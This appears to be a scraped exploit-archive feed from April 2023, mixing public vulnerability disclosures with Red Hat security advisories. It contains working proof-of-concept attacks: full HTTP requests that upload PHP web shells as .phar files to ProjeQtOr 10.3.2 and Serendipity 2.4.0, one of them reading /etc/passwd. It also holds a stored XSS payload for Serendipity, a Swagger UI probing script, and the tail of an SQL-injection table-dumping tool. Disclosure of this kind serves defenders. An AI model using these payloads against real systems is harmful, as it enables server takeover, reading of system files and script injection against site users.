bcolors.ENDC)        print('  Any malicious or illegal activity may be punishable by law')        print('  Use at your own risk')    elif len(args) == 0:        try:            if options.url != None:                if options.l_databases != None:                    ListDatabases(options.url)                if options.database != None:                    if options.l_tables != None:                        ListTables(options.url, options.database)                    if options.table != None:                        if options.dump != None:                            DumpTable(options.url, options.database, options.table)        except:            print("Unexpected error")if __name__ == '__main__':    try:        Main()    except KeyboardInterrupt:        print()        print(infos.PROCESS + "Exiting...")        print()        exit(1)

Chitor-CMS 1.1.2 SQL Injection

ProjeQtOr Project Management System version 10.3.2 suffers from a remote shell upload vulnerability.

Exploit Title: ProjeQtOr Project Management System 10.3.2   -Remote Code Execution (RCE)  
Application: ProjeQtOr Project Management System  
Version: 10.3.2  
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload  
Technology: PHP  
Vendor URL: https://www.projeqtor.org  
Software Link: https://sourceforge.net/projects/projectorria/files/projeqtorV10.3.2.zip/download  
Date of found: 19.04.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
Possible including php file with phar extension while uploading image. Rce is triggered when we visit again

Payload:<?php echo system("id"); ?>

poc request:

POST /projeqtor/tool/saveAttachment.php?csrfToken= HTTP/1.1  
Host: localhost  
Content-Length: 1177  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Accept: application/json  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryY0bpJaQzcvQberWR  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
sec-ch-ua-platform: "Linux"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/projeqtor/view/main.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: currency=USD; PHPSESSID=2mmnca4p7m93q1nmbg6alskiic  
Connection: close

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentFiles[]"; filename="miri.phar"  
Content-Type: application/octet-stream

<?php echo system("id"); ?>

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentId"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentRefType"

User  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentRefId"

1  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentType"

file  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="MAX_FILE_SIZE"

10485760  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentLink"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentDescription"

------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="attachmentPrivacy"

1  
------WebKitFormBoundaryY0bpJaQzcvQberWR  
Content-Disposition: form-data; name="uploadType"

html5  
------WebKitFormBoundaryY0bpJaQzcvQberWR--

visit: http://localhost/projeqtor/files/attach/attachment_5/miri.phar

ProjeQtOr Project Management System 10.3.2 Shell Upload

Red Hat Security Advisory 2023-1893-01 - Red Hat Multicluster Engine Hotfix Security Update for Console. Red Hat Product Security has rated this update as having a security impact of Critical.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Critical: Multicluster Engine for Kubernetes 2.0 hotfix security update for console  
Advisory ID:       RHSA-2023:1893-01  
Product:           multicluster engine for Kubernetes  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1893  
Issue date:        2023-04-20  
CVE Names:         CVE-2022-4304 CVE-2022-4415 CVE-2022-4450   
                   CVE-2023-0215 CVE-2023-0286 CVE-2023-23916   
                   CVE-2023-29017 CVE-2023-29199 CVE-2023-30547   
=====================================================================

1. Summary:

Red Hat Multicluster Engine Hotfix Security Update for Console

Red Hat Product Security has rated this update as having a security impact  
of Critical. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

Security Fix(es)

* CVE-2023-29017 vm2: Sandbox Escape  
* CVE-2023-29199 vm2: Sandbox Escape  
* CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

3. Solution:

Before applying this update, make sure all previously released errata  
relevant to your system have been applied, and that you are running  
Multicluster Engine for Kubernetes version 2.0.7.

See https://access.redhat.com/solutions/7007647 for instructions on how to  
apply this hotfix, as well as for information about when the hotfix has  
been  
superseded by a permanent fix and should be removed.

Important: This hotfix is a temporary fix that will be supported until 30  
days after the date when the next patch release of the product is released.  
After the 30-day period ends, you must either update to the latest patch  
release and remove this hotfix to continue receiving security updates and  
maintain support or upgrade to a newer feature release of the product.

4. Bugs fixed (https://bugzilla.redhat.com/):

2185374 - CVE-2023-29017 vm2: sandbox escape  
2187409 - CVE-2023-29199 vm2: Sandbox Escape  
2187608 - CVE-2023-30547 vm2: Sandbox Escape when exception sanitization

5. References:

https://access.redhat.com/security/cve/CVE-2022-4304  
https://access.redhat.com/security/cve/CVE-2022-4415  
https://access.redhat.com/security/cve/CVE-2022-4450  
https://access.redhat.com/security/cve/CVE-2023-0215  
https://access.redhat.com/security/cve/CVE-2023-0286  
https://access.redhat.com/security/cve/CVE-2023-23916  
https://access.redhat.com/security/cve/CVE-2023-29017  
https://access.redhat.com/security/cve/CVE-2023-29199  
https://access.redhat.com/security/cve/CVE-2023-30547  
https://access.redhat.com/security/updates/classification/#critical

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZEDATdzjgjWX9erEAQgHDA/+NBToWyhBOItP0HV3Bjrc6SiFhFSuThC6  
5KQWp8vvNVVhGLone3S1EIa0cbL0Js0fNZgAi2oe3jIdm03o35ZgF/bzBgrtCgec  
zoa6HdgiPWsSnarN7UQlQlGy3xy580BdaSgDnhbw/7fnHX6tVrRkUU/i1eFjWy9V  
vMdP+EBn4puXRsNJiuEzoVRhumHfUMKS0B9Im3rL1p9xmFwy0XGgDWtBSQrFBjOh  
JzRDkCjKZSeDBCzqkJKP0q038qmcxCy081OdcC5SW0UjNzp9OaU/F4les98bJTS+  
r8fn73752+OStNRG6uF7882dW7LO7QhaVbgLkjZGe3pUXQuCapHZDUWUkYExICS1  
TzBidPGWEKTILK2cEhiDFy4/Sxxfpd+mTGzhIXxM/zCv77KRyTEMPV50tkev8US1  
bzA/IyBX5SGP//CbWThSXpz5qv7zKrKk33Qs+KdZrZUghq7dxpBs3621YenoJHex  
QTtZ9YtORkIflIG9vRCtqnzNDJbOXMX2TEktqF+QbxQ+uWrLxl5UOosbpTgCavZE  
pBHqfWn+irrpTTou/hwTF6rfM5BNl/tBCFI1uJg/gutS2hobRnd/vk2dKInjUNFl  
Ru9fmebjpR+nT6x+CZCwWejms97XEH4x4watkWDAd2Mvk2iSrDsVS3y5XchBjEgl  
+dgeI362RcQ=  
=PcUu  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1893-01

Swagger UI version 4.1.3 user interface misrepresentation of information proof of concept exploit.

# Exploit Title: Swagger UI 4.1.3 - User Interface (UI) Misrepresentation of Critical Information  
# Date: 14 April, 2023  
# Exploit Author: Rafael Cintra Lopes  
# Vendor Homepage: https://swagger.io/  
# Version: < 4.1.3  
# CVE: CVE-2018-25031  
# Site: https://rafaelcintralopes.com.br/

# Usage: python swagger-exploit.py https://[swagger-page].com

from selenium import webdriver  
from selenium.webdriver.common.desired_capabilities import DesiredCapabilities  
from selenium.webdriver.chrome.service import Service  
import time  
import json  
import sys

if __name__ == "__main__":

  target = sys.argv[1]

  desired_capabilities = DesiredCapabilities.CHROME  
  desired_capabilities["goog:loggingPrefs"] = {"performance": "ALL"}

  options = webdriver.ChromeOptions()  
  options.add_argument("--headless")  
  options.add_argument("--ignore-certificate-errors")  
  options.add_argument("--log-level=3")  
  options.add_experimental_option("excludeSwitches", ["enable-logging"])

  # Browser webdriver path  
  drive_service = Service("C:/chromedriver.exe")

  driver = webdriver.Chrome(service=drive_service,  
              options=options,  
              desired_capabilities=desired_capabilities)

  driver.get(target+"?configUrl=https://petstore.swagger.io/v2/hacked1.json")  
  time.sleep(10)  
  driver.get(target+"?url=https://petstore.swagger.io/v2/hacked2.json")  
  time.sleep(10)

  logs = driver.get_log("performance")

  with open("log_file.json", "w", encoding="utf-8") as f:  
    f.write("[")

    for log in logs:  
      log_file = json.loads(log["message"])["message"]

      if("Network.response" in log_file["method"]  
          or "Network.request" in log_file["method"]  
          or "Network.webSocket" in log_file["method"]):

        f.write(json.dumps(log_file)+",")  
    f.write("{}]")

  driver.quit()

  json_file_path = "log_file.json"  
  with open(json_file_path, "r", encoding="utf-8") as f:  
    logs = json.loads(f.read())

  for log in logs:  
    try:  
      url = log["params"]["request"]["url"]

      if(url == "https://petstore.swagger.io/v2/hacked1.json"):  
        print("[Possibly Vulnerable] " + target + "?configUrl=https://petstore.swagger.io/v2/swagger.json")

            if(url == "https://petstore.swagger.io/v2/hacked2.json"):  
        print("[Possibly Vulnerable] " + target + "?url=https://petstore.swagger.io/v2/swagger.json")

    except Exception as e:  
      pass

Swagger UI 4.1.3 Critical Information Misrepresentation

Serendipity version 2.4.0 suffers from a cross site scripting vulnerability.

    Exploit Title: Serendipity 2.4.0 - Cross-Site Scripting (XSS)Author: Mirabbas AğalarovApplication: SerendipityVersion: 2.4.0Bugs:  Stored XSSTechnology: PHPVendor URL: https://docs.s9y.org/Software Link: https://docs.s9y.org/downloads.htmlDate of found: 13.04.2023Tested on: Linux 2. Technical Details & POC========================================steps: 1.Anyone who has the authority to create the new entry can do thispayload: hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3EPOST /serendipity/serendipity_admin.php? HTTP/1.1Host: localhostContent-Length: 730Cache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=entries&serendipity[adminAction]=newAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=c74c7da50976c82e628d7a8dfdb7c9e3ebc8188b; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1bConnection: closeserendipity%5Baction%5D=admin&serendipity%5BadminModule%5D=entries&serendipity%5BadminAction%5D=save&serendipity%5Bid%5D=&serendipity%5Btimestamp%5D=1681366826&serendipity%5Bpreview%5D=false&serendipity%5Btoken%5D=ae9b8ae35a756c24f9552a021ee81d56&serendipity%5Btitle%5D=asdf&serendipity%5Bbody%5D=hello%3Cimg+src%3Dx+onerror%3Dalert%283%29%3E&serendipity%5Bextended%5D=&serendipity%5Bchk_timestamp%5D=1681366826&serendipity%5Bnew_date%5D=2023-04-13&serendipity%5Bnew_time%5D=10%3A20&serendipity%5Bisdraft%5D=false&serendipity%5Ballow_comments%5D=true&serendipity%5Bpropertyform%5D=true&serendipity%5Bproperties%5D%5Baccess%5D=public&ignore_password=&serendipity%5Bproperties%5D%5Bentrypassword%5D=&serendipity%5Bchange_author%5D=12. visit the entry you created

Serendipity 2.4.0 Cross Site Scripting

Serendipity version 2.4.0 suffers from a remote shell upload vulnerability.

Exploit Title: Serendipity 2.4.0  - Remote Code Execution (RCE) (Authenticated)  
Application: Serendipity   
Version:  2.4.0   
Bugs:  Remote Code Execution (RCE) (Authenticated) via file upload  
Technology: PHP  
Vendor URL: https://docs.s9y.org/  
Software Link: https://docs.s9y.org/downloads.html  
Date of found: 13.04.2023  
Author: Mirabbas Ağalarov  
Tested on: Linux 

2. Technical Details & POC  
========================================  
If we load the poc.phar file in the image field while creating a category, we can run commands on the system.  
<?php echo system("cat /etc/passwd"); ?>  
 I wrote a file with the above payload, a poc.phar extension, and uploaded it.

Visit to http://localhost/serendipity/uploads/poc.phar

poc request:

POST /serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC HTTP/1.1  
Host: localhost  
Content-Length: 1561  
Cache-Control: max-age=0  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Linux"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryZWKPiba66PSVGQzc  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: iframe  
Referer: http://localhost/serendipity/serendipity_admin.php?serendipity[adminModule]=media&serendipity[adminAction]=addSelect&serendipity[adminModule]=media&serendipity[htmltarget]=category_icon&serendipity[filename_only]=true&serendipity[noBanner]=true&serendipity[noSidebar]=true&serendipity[noFooter]=true&serendipity[showUpload]=true&serendipity[showMediaToolbar]=false&serendipity[sortorder][perpage]=8&serendipity[sortorder][order]=i.date&serendipity[sortorder][ordermode]=DESC  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Cookie: serendipity[old_session]=st6cvq3rea6l8dqgjs1nla6s1b; serendipity[author_token]=430b341df3f78f52691c8cf935fa04e1c05854df; serendipity[toggle_extended]=; serendipity[entrylist_filter_author]=; serendipity[entrylist_filter_category]=; serendipity[entrylist_filter_isdraft]=; serendipity[entrylist_sort_perPage]=; serendipity[entrylist_sort_ordermode]=; serendipity[entrylist_sort_order]=; serendipity[only_path]=; serendipity[only_filename]=; serendipity[hideSubdirFiles]=; serendipity[addmedia_directory]=; serendipity[sortorder_perpage]=8; serendipity[sortorder_order]=i.date; serendipity[sortorder_ordermode]=DESC; serendipity[filter][i.date][from]=; serendipity[filter][i.date][to]=; serendipity[filter][i.name]=; serendipity[imgThumbWidth]=400; serendipity[imgThumbHeight]=267; serendipity[imgWidth]=1000; serendipity[imgHeight]=667; serendipity[imgID]=1; serendipity[baseURL]=http%3A//localhost/serendipity/; serendipity[indexFile]=index.php; serendipity[imgName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.jpeg; serendipity[thumbName]=/serendipity/uploads/photo-1575936123452-b67c3203c357.serendipityThumb.jpeg; serendipity[hotlink]=; serendipity[serendipity_htmltarget]=category_icon; serendipity[serendipity_filename_only]=true; serendipity[serendipity_linkThumbnail]=no; serendipity[]=Done; accessibletab_mediaupload_tabs_active=0; serendipity[filter][fileCategory]=; s9y_6991e531dd149036decdb14ae857486a=st6cvq3rea6l8dqgjs1nla6s1b  
Connection: close

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[token]"

ae9b8ae35a756c24f9552a021ee81d56  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[action]"

admin  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[adminModule]"

media  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[adminAction]"

add  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[userfile][1]"; filename="poc.phar"  
Content-Type: application/octet-stream

<?php echo system("cat /etc/passwd");?>

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_filename][1]"

poc.phar  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_directory][1]"

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[column_count][1]"

true  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[imageurl]"

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[imageimporttype]"

image  
------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_filename][]"

------WebKitFormBoundaryZWKPiba66PSVGQzc  
Content-Disposition: form-data; name="serendipity[target_directory][]"

------WebKitFormBoundaryZWKPiba66PSVGQzc--

poc video :  https://youtu.be/_VrrKOTywgo

Serendipity 2.4.0 Shell Upload

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.This content is licensed under the Creative Commons Attribution 4.0 International License (https://creativecommons.org/licenses/by/4.0/). If you distribute this content, or a modified version of it, you must provide attribution to Red Hat Inc. and provide a link to the original.

Related CVEs:
* CVE-2023-28205: A flaw was found in the webkitgtk package. An improper input validation issue may lead to a use-after-free vulnerability. This vulnerability allows attackers with network access to pass specially crafted web content files, causing Denial of Service or Arbitrary Code Execution.


Skip to navigation Skip to main content

**Utilities**

*   Subscriptions
*   Downloads
*   Containers
*   Support Cases

**Infrastructure and Management**

*   Red Hat Enterprise Linux
*   Red Hat Virtualization
*   Red Hat Identity Management
*   Red Hat Directory Server
*   Red Hat Certificate System
*   Red Hat Satellite
*   Red Hat Subscription Management
*   Red Hat Update Infrastructure
*   Red Hat Insights
*   Red Hat Ansible Automation Platform

**Cloud Computing**

*   Red Hat OpenShift
*   Red Hat CloudForms
*   Red Hat OpenStack Platform
*   Red Hat OpenShift Container Platform
*   Red Hat OpenShift Data Science
*   Red Hat OpenShift Online
*   Red Hat OpenShift Dedicated
*   Red Hat Advanced Cluster Security for Kubernetes
*   Red Hat Advanced Cluster Management for Kubernetes
*   Red Hat Quay
*   Red Hat CodeReady Workspaces
*   Red Hat OpenShift Service on AWS

**Storage**

*   Red Hat Gluster Storage
*   Red Hat Hyperconverged Infrastructure
*   Red Hat Ceph Storage
*   Red Hat OpenShift Data Foundation

**Runtimes**

*   Red Hat Runtimes
*   Red Hat JBoss Enterprise Application Platform
*   Red Hat Data Grid
*   Red Hat JBoss Web Server
*   Red Hat Single Sign On
*   Red Hat support for Spring Boot
*   Red Hat build of Node.js
*   Red Hat build of Thorntail
*   Red Hat build of Eclipse Vert.x
*   Red Hat build of OpenJDK
*   Red Hat build of Quarkus

**Integration and Automation**

*   Red Hat Process Automation
*   Red Hat Process Automation Manager
*   Red Hat Decision Manager

All Products

Issued:

2023-04-20

Updated:

2023-04-20

**RHSA-2023:1919 - Security Advisory**

*   Overview
*   Updated Packages

**Synopsis**

Important: webkit2gtk3 security update

**Type/Severity**

Security Advisory: Important

**Red Hat Insights patch analysis**

Identify and remediate systems affected by this advisory.

View affected systems

**Topic**

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.  

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

**Description**

WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform.  

Security Fix(es):  

*   WebKitGTK: use-after-free leads to arbitrary code execution (CVE-2023-28205)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

**Affected Products**

*   Red Hat Enterprise Linux for x86\_64 8 x86\_64
*   Red Hat Enterprise Linux for IBM z Systems 8 s390x
*   Red Hat Enterprise Linux for Power, little endian 8 ppc64le
*   Red Hat Enterprise Linux for ARM 64 8 aarch64

**Fixes**

*   BZ - 2185724 - CVE-2023-28205 WebKitGTK: use-after-free leads to arbitrary code execution

**Red Hat Enterprise Linux for x86\_64 8**

SRPM

webkit2gtk3-2.36.7-1.el8\_7.3.src.rpm

SHA-256: 24f66426606c1364370266a871e91e458ff21022e2614f7cde3727b19ebf9596

x86\_64

webkit2gtk3-2.36.7-1.el8\_7.3.i686.rpm

SHA-256: 2a63d88b18d85a96408c539faa99eb6abb562188816c97ce09c28c6654bf3497

webkit2gtk3-2.36.7-1.el8\_7.3.x86\_64.rpm

SHA-256: ee31113ea620e3a6e526d42fa0b42b1463846747fc46b1d6a5c640a821682c7e

webkit2gtk3-debuginfo-2.36.7-1.el8\_7.3.i686.rpm

SHA-256: 763b0f35556d4e01d0e0cb810c9d2f090d116c734fccb48ba445538b3563c34a

webkit2gtk3-debuginfo-2.36.7-1.el8\_7.3.x86\_64.rpm

SHA-256: da35913e258c85220ac856a356e0ebf820605eee2e96c1672cd2260767c3c12c

webkit2gtk3-debugsource-2.36.7-1.el8\_7.3.i686.rpm

SHA-256: 2bfa5383dc6b686738d2b59704339d94af511fde2c666b1fc924e47dba5f9b13

webkit2gtk3-debugsource-2.36.7-1.el8\_7.3.x86\_64.rpm

SHA-256: 878db4e94441e4b78689ecd09f30adae86baef92b29d87e6dcf12cf67470b6ce

webkit2gtk3-devel-2.36.7-1.el8\_7.3.i686.rpm

SHA-256: bc1a09df61f1a75735bccb79d99bfde615e923c779652230b15af0cbdb921044

webkit2gtk3-devel-2.36.7-1.el8\_7.3.x86\_64.rpm

SHA-256: 29484afa85f5de5503a9c0964d7c237b689a4b4dcd33e1cdeaa7eb50eac297c1

webkit2gtk3-devel-debuginfo-2.36.7-1.el8\_7.3.i686.rpm

SHA-256: cd30805a6ef21d042968922c71b1d3255b44244bcae96836eeaa030d5c53ff73

webkit2gtk3-devel-debuginfo-2.36.7-1.el8\_7.3.x86\_64.rpm

SHA-256: 3dac9c6ce4a3481f1405450c498c4b0c454c989305e1bfabf56ec3c0f855325d

webkit2gtk3-jsc-2.36.7-1.el8\_7.3.i686.rpm

SHA-256: a96eecac0a9b7248b795868c69cceff35576055f058a70517c76b5322d194a64

webkit2gtk3-jsc-2.36.7-1.el8\_7.3.x86\_64.rpm

SHA-256: 63b46c69340d6b7ca014866498d0f50f583ebfc84ef8367ee943c1f478b17b71

webkit2gtk3-jsc-debuginfo-2.36.7-1.el8\_7.3.i686.rpm

SHA-256: 71f382e304ec9f7c5b0dd89730933c96a65c44a839efdb6c6f2591d30e8c6746

webkit2gtk3-jsc-debuginfo-2.36.7-1.el8\_7.3.x86\_64.rpm

SHA-256: 91b67c03787d809a8212f6a60cfb7d74df9a62a0fa9995447ca6d80c41e6ac7a

webkit2gtk3-jsc-devel-2.36.7-1.el8\_7.3.i686.rpm

SHA-256: 30293ef8c719ad06891c2107005305f3033fa32575734f414ebdd676ecc78a61

webkit2gtk3-jsc-devel-2.36.7-1.el8\_7.3.x86\_64.rpm

SHA-256: 2e3bb87fe9a1480d925ed8072932f9fce5564a45f3d0a4cea8b9a71e29e9ac76

webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8\_7.3.i686.rpm

SHA-256: 1d3455d21e5697e1da9cf5f0e17a95a049c62d8a68406008db14d1b9ceb44fd0

webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8\_7.3.x86\_64.rpm

SHA-256: c39613a4d1359f137635193194bc254dbe38907949733e9b412c1a0ec26a718a

**Red Hat Enterprise Linux for IBM z Systems 8**

SRPM

webkit2gtk3-2.36.7-1.el8\_7.3.src.rpm

SHA-256: 24f66426606c1364370266a871e91e458ff21022e2614f7cde3727b19ebf9596

s390x

webkit2gtk3-2.36.7-1.el8\_7.3.s390x.rpm

SHA-256: 649540e7eaf18131859bda93bbbd4fbc61dde96fd421b4bc907c5bc44bf86d1b

webkit2gtk3-debuginfo-2.36.7-1.el8\_7.3.s390x.rpm

SHA-256: 4d409cea2edc72ea95a92f2ecf2148810180d71bebf85c30f31528d909b6581d

webkit2gtk3-debugsource-2.36.7-1.el8\_7.3.s390x.rpm

SHA-256: fdcd5e846f5dd770a674ab2a196c4b798290a9077ad85267d24d974667ed133e

webkit2gtk3-devel-2.36.7-1.el8\_7.3.s390x.rpm

SHA-256: 3d8df1a310b9e5bf5c1ce5409e9d294445ef0d54ee56fbacab1e71bef268bdb4

webkit2gtk3-devel-debuginfo-2.36.7-1.el8\_7.3.s390x.rpm

SHA-256: 9944e142a72aad94ad5e841be7809f984a121ac9c9205b596b55627c819c20ed

webkit2gtk3-jsc-2.36.7-1.el8\_7.3.s390x.rpm

SHA-256: 79f4e474405167f8e5072065aaaf04377b8e7845ca8a71cce459bf8026f90b95

webkit2gtk3-jsc-debuginfo-2.36.7-1.el8\_7.3.s390x.rpm

SHA-256: cb00694a00066f3dabe5139a9034b12e4515f9420b6d4996514216e24ec7bd17

webkit2gtk3-jsc-devel-2.36.7-1.el8\_7.3.s390x.rpm

SHA-256: c5b10bec6290ce9b78ffaa3015dbea109826e8dbfeb65e0c881729a20937690b

webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8\_7.3.s390x.rpm

SHA-256: 63c622b2c20e39c704174c59e3a4fe89481a6fe2039c55c43d6ce6c33411e09c

**Red Hat Enterprise Linux for Power, little endian 8**

SRPM

webkit2gtk3-2.36.7-1.el8\_7.3.src.rpm

SHA-256: 24f66426606c1364370266a871e91e458ff21022e2614f7cde3727b19ebf9596

ppc64le

webkit2gtk3-2.36.7-1.el8\_7.3.ppc64le.rpm

SHA-256: d832500e8cbea4c5e38ee3496d51a19bbc69f1662af91ed8931409d6e322d916

webkit2gtk3-debuginfo-2.36.7-1.el8\_7.3.ppc64le.rpm

SHA-256: ec56c707dabaf1a472ea02e11dd7058fcc9ab4f57a49bb0aff9df026fafe57cb

webkit2gtk3-debugsource-2.36.7-1.el8\_7.3.ppc64le.rpm

SHA-256: 26eb7f3c61e85347e10241852f81fc482c2580ea0af2f9027e878c23c6e91c24

webkit2gtk3-devel-2.36.7-1.el8\_7.3.ppc64le.rpm

SHA-256: 2d9bdbcb713352a90c4738241cb769c32146f0c90736d0435250b1df503095b7

webkit2gtk3-devel-debuginfo-2.36.7-1.el8\_7.3.ppc64le.rpm

SHA-256: 1d5fb14580b09e29678683ce44d9f47e18043982afb81d25fdc78274c956f835

webkit2gtk3-jsc-2.36.7-1.el8\_7.3.ppc64le.rpm

SHA-256: 8e15fae766cc96ddb26fb8383bfecd6d21ca7828a8df7a95faa0fef689fcb9e9

webkit2gtk3-jsc-debuginfo-2.36.7-1.el8\_7.3.ppc64le.rpm

SHA-256: 910db545809db4e9414271b182ef3ed99c7c68844c7b20729da5f49c946968f0

webkit2gtk3-jsc-devel-2.36.7-1.el8\_7.3.ppc64le.rpm

SHA-256: b610ad0aa1711cb58c8455dc3636c613e6d2afa730a423ce261e6dcd6d334426

webkit2gtk3-jsc-devel-debuginfo-2.36.7-1.el8\_7.3.ppc64le.rpm

SHA-256: 13733668602cfe7ad709fb70e08d4f53c603bdf2c6ec3add207814a949920d53

**Red Hat Enterprise Linux for ARM 64 8**

SRPM

webkit2gtk3-2.36.7-1.el8\_7.3.src.rpm

SHA-256: 24f66426606c1364370266a871e91e458ff21022e2614f7cde3727b19ebf9596

aarch64

webkit2gtk3-2.36.7-1.el8\_7.3.aarch64.rpm

SHA-256: bcc9d4de6e1aa93ac2ff48e56b323bedcef5d8efa61022df12ea430c26c18320

webkit2gtk3-debuginfo-2.36.7-1.el8\_7.3.aarch64.rpm

SHA-256: 844fe681b52c5127e747665a6cc2ce59a7a0a766ba7e815aec348c84cd78dd6a

webkit2gtk3-debugsource-2.36.7-1.el8\_7.3.aarch64.rpm

SHA-256: 89cbdb429c7eb4b6630faa189d2282ba074b4554cf3fede012725c76e4f890d1

webkit2gtk3-devel-2.36.7-1.el8\_7.3.aarch64.rpm

SHA-256: ab7d5c8ad16446b97b4a6bad65286ab5aa30fb4ef5038a8ec2dfc4d54f876305

webkit2gtk3-devel-debuginfo-2.36.7-1.el8\_7.3.aarch64.rpm

SHA-256: 980035255756f46185f97248d50dbc3e596fe4d6b873aa244a6c69d54b9954c3

webkit2gtk3-jsc-2.36.7-1.el8\_7.3.aarch64.rpm

SHA-256: 83dcbd7c3f635b7f8b647914421c88fa6e009f23c8e1964be8cdf2672db66137

webkit2gtk3-jsc-debuginfo-2.36.7-1.el8\_7.3.aarch64.rpm

SHA-256: 258009268a7d864d0d400da79e76dca30e2769f954c685cc77d39a98cc1b70e5

